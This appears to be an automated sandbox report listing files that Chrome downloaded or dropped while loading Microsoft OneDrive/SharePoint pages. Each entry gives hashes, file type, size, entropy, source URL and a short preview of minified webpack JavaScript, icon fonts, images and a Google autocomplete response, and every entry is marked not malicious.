                                                  MD5:DBAB05E17D9589A27F7CE65FE157A6F8
                                                  SHA1:CF61E5F8F7225BE68620352888A19682FA6EFE37
                                                  SHA-256:97D61AFDA2A2E05CF8FDBA68F5E1483CA91B8B761962813F47117EA5EB2E5491
                                                  SHA-512:ACAB1A129D28784289CE8F299B6717A74662119ABAE30C19D7AFE661D7AB2A298C54BB68BD109F23F05125F61482DE79445509E47E1E471122930701F8C866A1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[10],{2787:function(e,t,n){n.r(t),n.d(t,{docAlreadyExists:function(){return s},fileNotFound:function(){return i},invalidView:function(){return r},listNotFound:function(){return o},newExperieceRenderingNotSupported:function(){return d},offline:function(){return f},onePageNavigationError:function(){return u},onePageNavigationViewMismatch:function(){return l},parsingError:function(){return p},queryThrottled:function(){return c},urlTooLongError:function(){return a.a}});var a=n(604),i=-2147024894,r=-2147024809,o=-1,s=-2130575257,c=-2147024860,d=-2,l=-3,u=-4,f=-5,p=-7}.,2786:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return c},c:function(){return o},d:function(){return s},e:function(){return r}});var a,i=n(2787);!function(e){e[e.icon=16]="icon",e[e.iconMin=16]="iconMin",e[e.bigIcon=48]="bigIcon",e[e.bigIconMin=48]="bigIconMin",e[e.regularMin=90]="regularMin",e[e.regular=130]="regular",e[e.nameMin=220
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 12324, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):12324
                                                  Entropy (8bit):7.96709528526618
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F92064E04A39C85DBEFE721D2B1B6D7F
                                                  SHA1:8ED71489F914761CE0659FF5648408F08FCC5ABC
                                                  SHA-256:92BBDD250F80B5FAC0A9252EC3A8BCE0C6E317036AAA0C62A6C09278EDECBE42
                                                  SHA-512:570F13245C1CE9E341905EC17C51BCEF46AC4107D6CDAF0B675493901010314B2DF9B865A4FD69D68BA0EB848DAFCFCFF89C0AA92A8C0C9D448347273F962399
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-12-3873307a.woff
                                                  Preview:wOFF......0$......`.........................OS/2.......G...`0.p5cmap...P...C....h.]}gasp................glyf......(/..Q<.S,.head..*....4...6#.hhea..+........$....hmtx..+ ...g....($..loca..+.........!...maxp..,T....... .t..name..,l.......O..R.post..0........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px!......!...X <....I....x...O(.q.....I.R.hEN\V.&jG..0..J.....J.....W!c.I\,.\.81D$....]9Q._.ru[.z...s....P.U......(d.q....P..s..#........,IH.%,+....}9.c....KV......p..Mp..mp..... F0.).1. .X.&....I<X.R.......\k1.._..$...$...I....E..Z.....,.qtr....O|.)^.U>b?.x..9.Q.f.o.vs@....5\.]\.-..Gn.wz.4%.>....J1J.I......9.P....a/..... #.=.............x..|.x....V+...km...j....mY......$.M.b.E.......m.,....p!<n..RB......T=.......yN..C...;.E.s..............].jggg.....?.........]..,...8F...].0....z..5u..ut....P.m.^V.U@.]`..gk:........ef...a..!l.XaT..V.Fj.@O....j.].Z..h... ...p ..&pb0.. .{...+d..B...-....n..n+.......p'....P{..0*.YK....u......7..,..>^m.....}.V...Q./g
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (6192)
                                                  Category:dropped
                                                  Size (bytes):26305
                                                  Entropy (8bit):5.217281647391174
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BAC9A85A396903993840A20667F2D1B9
                                                  SHA1:0D58A2D9EE1C066A99A53A59F641960AE9813C4E
                                                  SHA-256:5A8C44325296C5540CA43E61F574E46B8D78A263B2738EC003C0436CEEA00F67
                                                  SHA-512:575B8307AA2742A7D1843624C1657DC1778FB8192B25EC0366BD9B5CF42AAA686EB896C15B549A558493E72EC4E9018EF0B26484F1D340C6E8C8C0F489DA369F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[87],{3197:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return a}});var a={none:0,allow:1,allowWithJustification:2},i={none:0,falsePositiveReported:1,overridden:2,falsePositiveReportedAndOverridden:3},r={override:0,reportFalsePositive:1}}.,2931:function(e,t){t.a={controls:1,quota:2,pushChannel:3,firstRun:4}}.,2592:function(e,t,n){n.r(t),n.d(t,{resourceKey:function(){return o}});var a=n(2457),i=n("odsp.util_460"),r=n(1161),o=new i.hK({name:"".concat("IsDetailsPaneExpanded",".isDetailsPaneExpanded"),factory:{dependencies:{detailsPaneId:r.a,observablesFactoryType:a.e},create:function(e){var t=new(0,e.observablesFactoryType)({});return{instance:t.create(!1),disposable:t}}}})}.,2517:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e[e.notConfigured=0]="notConfigured",e[e.visible=1]="visible",e[e.notVisible=2]="notVisible"}(a||(a={}))}.,2586:function(e,t,n){n.d(t
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (851)
                                                  Category:downloaded
                                                  Size (bytes):856
                                                  Entropy (8bit):5.152953469306816
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:170AB56D09F37911FA5225E78CA1F621
                                                  SHA1:1CDEF39FCC66C4453915354CB9121BACCFC954C5
                                                  SHA-256:7499F0CFBE97AE8F260781F39408ADAE6CCEB6F370276AC3CB2A0A62F82C61C1
                                                  SHA-512:6EB961594432676EC10EE54183163D7449AC8B0ED321B5D5B188DC6F305F0686791455E7A077E17BFEE2A23D09C19019EB10EEF7962A171D13358C23E1F7814A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                  Preview:)]}'.["",["sony forces bungie to fix destiny 2","home depot overcharging lawsuit","derrick white colorado state","disney world homeless","daily horoscope today","interest rates federal reserve","parmalee paige bueckers","new watch faces watchos 11"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:fieldtrialtriggered":true,"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,395,760],[3,143,362,395],[3,143,362],[3,143,362],[3,143,362],[3,143,362,395],[3,143,362,395],[3,143,362,395]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4829)
                                                  Category:dropped
                                                  Size (bytes):12059
                                                  Entropy (8bit):5.451986502810502
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E3E7BC5D82E42579831CC1674EEBB97A
                                                  SHA1:1BC924DE260D2A54184C01C6F0ACAE417C1B2B74
                                                  SHA-256:8151FEB382BC9B61B387F44B202A71297CC2EFC78988B615F9C6B6C342574DF7
                                                  SHA-512:9D46E6DEE9148B0B81D16E5BEF592AFB9A83E7ADFB0A976CC3F69776706C165F6282D27857FA047697253909EC42EB3F28937793C7A4AA7CC2A3F4B52D36BEC4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[37],{3825:function(e,t,n){n.d(t,{a:function(){return s},b:function(){return d}});var a=n(5903),i=n(1807),r=n(8050),o=n("odsp.util_460").HW.isActivated("686714b6-ee9c-44e7-9cc2-1fbe75a88eac"),s={ID:"",displayName:r.b,realFieldName:"File size",internalName:"FileSizeDisplay",type:i.a.FileSize,width:150,isCalculated:!0,isReadOnly:!0,isSortable:!0,isEditable:!1,rawFieldData:{FieldType:"FileSize",Name:"FileSizeDisplay",Groupable:"FALSE"}},c={ID:"",displayName:r.a,realFieldName:"Activity",internalName:"FileActivity",type:i.a.FileActivity,width:445,isCalculated:!0,isSortable:!1,isReadOnly:!0,isEditable:!1};function d(e,t){var n=[],i=null;if((0,a.a)(t)){for(var r=0,d=e;r<d.length;r++){var l=d[r];"SharedWith"===l.internalName?i=l:n.push(l)}return o&&n.push(s),i&&n.push(i),n.push(c),n}return e}}.,4733:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("odsp.util_460").HW.isActivated("43c21516-7a9e-4d81-ba4e-373de20
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):16200
                                                  Entropy (8bit):4.1065941361756195
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:48D80779B127989CCFC24C653ECD992A
                                                  SHA1:5947B7FB6DDFE3CF63CF8BB05083E1DA605C302C
                                                  SHA-256:FA1A12DF1ACB58EE03C25D6A2F0145A48EE8F83AEBEB7D606402B6B68FE29E36
                                                  SHA-512:1FB8F7B9ED87478FC58242EF25A5A9EFE98A45852DB8E998DFA66AF41BE42664B3D722E7A6AACA4CBA05BEE57BE09F21824BC044F2E62BF2FFABEB5388D2E398
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_meeting_dark.svg
                                                  Preview:<svg width="220" height="222" viewBox="0 0 220 222" fill="none" xmlns="http://www.w3.org/2000/svg">..<path opacity="0.2" d="M184.395 186.005C229.419 157.416 217.516 110.412 197.766 70.3088C191.115 56.8041 192.668 31.8932 180.134 22.2853C155.094 3.08652 137.077 8.57249 122.146 26.4808C115.515 34.4355 102.273 41.9194 86.9565 36.7996C71.64 31.6797 22.873 31.6989 51.7818 90.6228C72.0567 131.944 41.4524 130.02 19.72 145.87C-1.62315 161.434 24.5621 193.375 50.3931 202.514C81.6088 213.56 155.576 204.305 184.395 186.005Z" fill="#797673"/>..<path d="M199.28 56.3973L199.184 56.3877C202.477 60.7089 205.82 65.034 209.212 69.363C206.125 91.3463 204.303 113.492 203.755 135.688C203.751 136 203.681 136.307 203.551 136.59C203.421 136.873 203.233 137.125 203 137.33C202.767 137.535 202.493 137.688 202.197 137.779C201.902 137.87 201.59 137.896 201.283 137.857C182.475 136.003 163.682 134.148 144.902 132.293C144.519 132.252 144.15 132.123 143.824 131.916C143.996 132.372 144.29 132.77 144.673 133.068C145.056
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (21942)
                                                  Category:dropped
                                                  Size (bytes):32884
                                                  Entropy (8bit):5.4475921324584125
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4DACB32A0AF1AB66A045F8D5179C54E1
                                                  SHA1:9E16CABB8EF2EAE4AFB5113A3C6C83187186F04A
                                                  SHA-256:27CB1D59D1DD29704D277DD7DE6B1627E34C6D8D10945099236BE9DACE69E1F2
                                                  SHA-512:B5EF94DC0803FAB0CF90CBA4795AE736DF4D6E1E9190A5C0BC6F0707B01225CFF6A8DCA0F56437FFEA7B1A6E401D66E9E966825419E24041EC90D92F3B34837D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[53],{4096:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return h},c:function(){return _},d:function(){return p},e:function(){return d},f:function(){return u},g:function(){return c},h:function(){return f},i:function(){return l}});var a=n(56),i=n(3518),r=n(1866),o=n(1865),s=n(4095);function c(e){return!!e.RemoteItem}function d(e){return!c(e)&&1===Number(e["Created_x0020_Date.ifnew"])}function l(e){return Number(null==e?void 0:e.PrincipalCount)>0||c(e)}function u(e){var t=(0,s.a)(e);if(void 0===e.PermMask&&void 0===t)return!1;var n=null==t?void 0:t.mountPoint,i=n&&n.permMask;if(i&&!a.a.hasItemPermission({permissions:i},a.a.editListItems))return!0;var o=(0,r.a)(e.PermMask);return!a.a.hasItemPermission({permissions:o},a.a.editListItems)}function f(e){return(Number(e._ComplianceFlags||"0")&i.a.TagPolicyRecord)===i.a.TagPolicyRecord}function p(e){var t=Number(e._VirusStatus)||0;return 0!==t&&3!==t}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):174911
                                                  Entropy (8bit):7.975981092204115
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:803CEB01F01E471C5923A098DF0CEC38
                                                  SHA1:6949B85FCB35FE372AE548D452222F3741EE30A3
                                                  SHA-256:F64DDBB70F682E3D5CFF038F60645C65A5F12FC6540C5847E8820874BDD5DC2A
                                                  SHA-512:FB44310C0C1CA2818BE89F2F985858C632CBE9E7F9BF657396B3B5A97BD2433BE54F2A34977E3050448013BA2528F090427AD99870904465D568EFB17860D92F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/error/error_offline.png
                                                  Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx.....-.u...sN.......5.@.P....@..EYf[.H.hG.-.-....v...m.AX.-;.n3dw.#$.v.L...(P#A.$1...P(.<.....7.{3...O.....a.*.]...2.f..<{.....X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X.b..+V.X
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (48338)
                                                  Category:dropped
                                                  Size (bytes):51418
                                                  Entropy (8bit):5.249480185424832
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:5DBDD0B577D2D24AC0EEA9250EE652FE
                                                  SHA1:97A11F9C2EDBD3379AD6155196AB83DA46945A5E
                                                  SHA-256:01433B1F93ADA2174535F9235A072E8EAE4066DE1A510C875C617530BA851833
                                                  SHA-512:4836D7DE2231BBC50A779200E2A60C3AA08E455DB74A07C769998343309FD9096992D79E94EB79EB5FA77D4B7081B5ED79E96DFABCEEB35C88937846D4289729
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_responsive_start"),(self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]=self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]||[]).push([["responsive"],{1229:function(e,t,n){(t=e.exports=n(145)(!1)).push([e.id,"html[dir=rtl] ._7PGqXIlT8jItdB8fOBmFkg\\=\\={transform:scaleX(-1);-moz-transform:scaleX(-1);-webkit-transform:scaleX(-1);-ms-transform:scaleX(-1)}",""]),t.locals={iconFontRTL:"_7PGqXIlT8jItdB8fOBmFkg=="}},8304:function(e,t,n){(t=e.exports=n(145)(!1)).push([e.id,'.M3pcB5evSAtYMozck1WU7A\\=\\={height:100%;line-height:48px;display:flex}._1QSK5lUhw5Gkh7SDz97ZPQ\\=\\={height:48px;display:flex}.siUMOJwnumycxvszBe3uzQ\\=\\={display:inherit;flex:inherit;justify-content:inherit;order:inherit;align-self:inherit;min-width:inherit}.\\/DyMYj2gNfPrYNbEWoV2\\/w\\=\\={font-size:14px;font-family:SegoeU
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3517)
                                                  Category:downloaded
                                                  Size (bytes):9070
                                                  Entropy (8bit):5.423899007397972
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E95ADA158B545D81312DA0B659AE722E
                                                  SHA1:CD4DDBF53995C78262F510FEF66E6F06BEBDCEDB
                                                  SHA-256:16F93874FC801F2B672DBA5CDA143D67BDBA4F85D7E7F3BA5D6ACC44AB05946F
                                                  SHA-512:BB715F3668F61FE997F0822006D5BBC4703FA72905B3B4CCD4967F5861AB05E8396BF4347B9C90E2FB1D01B9C04F842FF2C2A71392DE5F0C7421AE34FF8112E4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/4.js
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[4],{8027:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("react-lib"),i=n("fui.core_351"),r=n(220),o=n(160),s=n(159);const c=(0,i.pOW)("rhfpeu0",null,{r:[".rhfpeu0{gap:8px;height:fit-content;box-sizing:border-box;display:flex;grid-row-start:3;grid-row-end:3;}"],s:["@media screen and (max-width: 480px){.rhfpeu0{flex-direction:column;justify-self:stretch;}}"]}),d=(0,i.xbz)({gridPositionEnd:{Bdqf98w:"f1a7i8kp",Br312pm:"fd46tj4",Bw0ie65:"fsyjsko",B6n781s:"f1f41i0t",Bv5d0be:"f1jaqex3",v4ugfu:"f2ao6jk"},gridPositionStart:{Bdqf98w:"fsxvdwy",Br312pm:"fwpfdsa",Bw0ie65:"f1e2fz10",Bojbm9c:"f11ihkml",Bv5d0be:"fce5bvx",v4ugfu:"f2ao6jk"},fluidStart:{Bw0ie65:"fsyjsko"},fluidEnd:{Br312pm:"fwpfdsa"}},{d:[".f1a7i8kp{justify-self:end;}",".fd46tj4{grid-column-start:2;}",".fsyjsko{grid-column-end:4;}",".fsxvdwy{justify-self:start;}",".fwpfdsa{grid-column-start:1;}",".f1e2fz10{grid-column-end:2;}"],m:[["@media screen and (
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 16776, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):16776
                                                  Entropy (8bit):7.974961094782676
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C67215019B9FD89B9E29A16916BE5264
                                                  SHA1:D4448C620FFA5574ED0FCCBDB1AD2BEE466F136D
                                                  SHA-256:1F7216458568F394C796E011CB5DA2285C6D9C919E3D7C224CFD09DF6197AC50
                                                  SHA-512:2D111FDDE602CCAB07090B296B485CFE3790BDE13C92A62F5C506EC1D4637B8B53E7A46F15506EB4487D9CAFBF15F066CAEE883292B3E24C7CB5498E05B1C712
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-4-b2f6981b.woff
                                                  Preview:wOFF......A.................................OS/2.......G...`/:o.cmap...P........d8b.gasp................glyf......9Q..qLNP..head..<8...6...6#.hhea..<p.......$....hmtx..<....`.....=.ploca..<.........t...maxp..=........ .p./name..=........O..R.post..At....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px..1.....`u,......@t...x...K+.Q...3C............ll..h..,,..\Bb."......B.%Y......PX....._...{....~u.R~..D)...:......n}O.6eSN.3...b.].e..,`.KX.2.....f-...f.....r.C....8...q..\.:...]....<...y.k..|.+...J../..,..&..!...H..K.$I.........P....+d...J..L_..uj_./..o......'....g..EJ....D_..#G...w.:.p.mla./....0.E,`.........N0.q.a.....z..xP.w..F..T."..<.tw.y.l..9.F....;...V...(c.h2BBn.....?......O.6.................x..}....yoU......s......;..\+.....tK+.......... $..F.............8.X.{y.....@...c...c......vgz_..=..+..K..tuwuuu.W.....`......n.,...BX..BXwW9...b^.n......n...^B..pM........G#.(f3y.K..s..{.........v.8..9E..)....N.Ot....M.g../Un..aK.|.."5./y.`0;.`$.(..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (36303)
                                                  Category:dropped
                                                  Size (bytes):99458
                                                  Entropy (8bit):5.250025212258342
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9A0293D9A595568C74B8B4D5089D232A
                                                  SHA1:70C2CE30E608496BA8CFEFF113DF21E0ED14E821
                                                  SHA-256:F6F393B39E4E54EB3B13DAF9D15EFCD851B179728D93A5919B50879B62E1ABB5
                                                  SHA-512:BC72C2C42E4710010FE7FDA5B194D6222A755A94B9E7D283C660A46FC82902C6B7DBA62C826458881C728B9DC830ED8F42F3EC434D3C6D211C9AED295B89535F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[56,1242,1428],{2577:function(e,t,n){var a;!function(i,r){"use strict";var o=function(e){if("object"!=typeof e.document)throw new Error("Cookies.js requires a `window` with a `document` object");var t=function(e,n,a){return 1===arguments.length?t.get(e):t.set(e,n,a)};return t._document=e.document,t._cacheKeyPrefix="cookey.",t._maxExpireDate=new Date("Fri, 31 Dec 9999 23:59:59 UTC"),t.defaults={path:"/",secure:!1},t.get=function(e){return t._cachedDocumentCookie!==t._document.cookie&&t._renewCache(),t._cache[t._cacheKeyPrefix+e]},t.set=function(e,n,a){return(a=t._getExtendedOptions(a)).expires=t._getExpiresDate(n===r?-1:a.expires),t._document.cookie=t._generateCookieString(e,n,a),t},t.expire=function(e,n){return t.set(e,r,n)},t._getExtendedOptions=function(e){return{path:e&&e.path||t.defaults.path,domain:e&&e.domain||t.defaults.domain,expires:e&&e.expires||t.defaults.expires,secure:e&&e.secure!==r?e.secure:t.defaults.secure
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (47261)
                                                  Category:dropped
                                                  Size (bytes):47262
                                                  Entropy (8bit):5.3977431994288265
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D7BB07B6ECD6FB1A2E123203006C33BA
                                                  SHA1:09CC76938FA366E40992880FF94ACCD8BE0C6640
                                                  SHA-256:8EAE5159C56BF66C17E0CB002B25FC2E343F3E009DC2A39A7E230F08B7B8C672
                                                  SHA-512:D87C6B675EF3F260CC86BD130F91A08F5D07D301F2A7B14778C5CCF42BF0D605957FF653CA53C57203A85AADFF5F66F3514342A35DFAA581FBAF57FC3B72D722
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (14674)
                                                  Category:dropped
                                                  Size (bytes):17090
                                                  Entropy (8bit):5.144007950970827
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2DA1F8D6B7F41D488A9C8D0A4A67A8A7
                                                  SHA1:B81030C01A467425D7F1F536D0542B941F1A0B47
                                                  SHA-256:7D7851DDF69509CCF824147911B79B139E0F264ED038B8E934782B46BBA16807
                                                  SHA-512:D2563BAAD852EF7ED03FBE5381CDF9C775C65C692CE85588EEA3B3B1BAA4BDB08ABDF8EB938489E0CD1FFDD5887265398218E458B840A24BB66DED7F1194F0DB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[67],{4247:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a}}),(0,n("fui.util_369").Bv)([{rawString:".GetMoreStoragePrimaryButton_e2a5b042{background-color:"},{theme:"orange",defaultValue:"#d83b01"},{rawString:';border:"none";color:'},{theme:"white",defaultValue:"#fff"},{rawString:';width:"auto"}.GetMoreStoragePrimaryButton_e2a5b042:hover{background-color:'},{theme:"orange",defaultValue:"#d83b01"},{rawString:";color:"},{theme:"white",defaultValue:"#fff"},{rawString:";cursor:pointer}.GetMoreStoragePrimaryButtonV2_e2a5b042{background-color:"},{theme:"orange",defaultValue:"#d83b01"},{rawString:';border:"none";color:'},{theme:"white",defaultValue:"#fff"},{rawString:';width:"auto"}.GetMoreStoragePrimaryButtonV2_e2a5b042:hover{color:'},{theme:"white",defaultValue:"#fff"},{rawString:";cursor:pointer}"}]);const a="GetMoreStoragePrimaryButton_e2a5b042",i="GetMoreStoragePrimaryButtonV2_e2a5b042"}.,359
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):26392
                                                  Entropy (8bit):7.9886032667811735
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B2B60F1C7184B15EBD6CB2A213C323C5
                                                  SHA1:8FED557FF6E49376F3A4BC56F95A548D6075955D
                                                  SHA-256:DBA7C93D3CF4806133D8FE211DCE32AA12041FB82ACC4591F464052714878FB8
                                                  SHA-512:E1A4BB4AFA8FA8C09E163BA9C0D264425378C8D50F212E2932A2B21CBB6983B566180657BB753681B960D02CA4DEE73A5504D433C536E64DA979CDF34AABB8C7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/emptyfolder/empty_files_v3_dark.webp
                                                  Preview:RIFF.g..WEBPVP8X..............ALPH.4......$E...5M....BD.'.......:.mED.9I....>..kE.T'.+@)...j0k'.......%.....&..v.,m..6..Q....?...ADL.w=..j..r..mCG\pG..l..Z......$In....Gc...A..1...q...N......m...f.u.._r.. ..B.......g.R...n.]s.....h[.c..".s.h.y..=l.....zv.$...X....).'...|..333333.]...|.......t=.vU.J.v.....n...A.........o....O....O..OK'...ml.l@<.D......q...M..aJ..".G|.g....(..4p..4.........o4.."&.r.{)..P......ed>.*(.G....D.s....-0IAh.....f..d.]...x......G.s.i.jz].&BR...l/...z@.. ..y.A.FO...).Q5R!.$.(.;[.H.fV"F....4@'$...2.>..0$[...`..=..LF..c.. .!.....$........L.: ..?.P..z...!....D..<&g.G.a .jH....L...v..K.).0-..Ux.v....,1....F{.n.S......v.V$T(.UV.%...."&.}L.......9B.#h.t..K....,..".......\+. .0...HO..b..p.V..*/U6.`..W..*:.....f...t"A...7....P0...A...T....*....=6..G`..oj..B.C.F.......AM...f...+..R.a..w....v.tM.$9V.K.<.6e.a..j.....AHl*.d ....mq63S.T..d.$._.,E.I...Q..^.eR2.. .....UZ.4V.m....u.6.!.A+...*.}l...- C.E.e$.$q~........'n....4..^m..A...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (21706)
                                                  Category:downloaded
                                                  Size (bytes):124976
                                                  Entropy (8bit):5.532826932374007
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AD8EFFE146A6365D7B5864160A8AC9CF
                                                  SHA1:6E1091E8082FC4FE131DCAE0842678DBE4308AB8
                                                  SHA-256:948D1788F12145E927FBEDCA00961870E1C100F72AF057F16515DF3C1FBC28B8
                                                  SHA-512:24905A0AA7AE5E26429979672A8AD9365CDD76809178676EEACD3347C28B6730504BCE6AB1D5E292983F970C4D5D7ADFC64E34F4231FA4188E5F1902A9048EF9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/14096.js
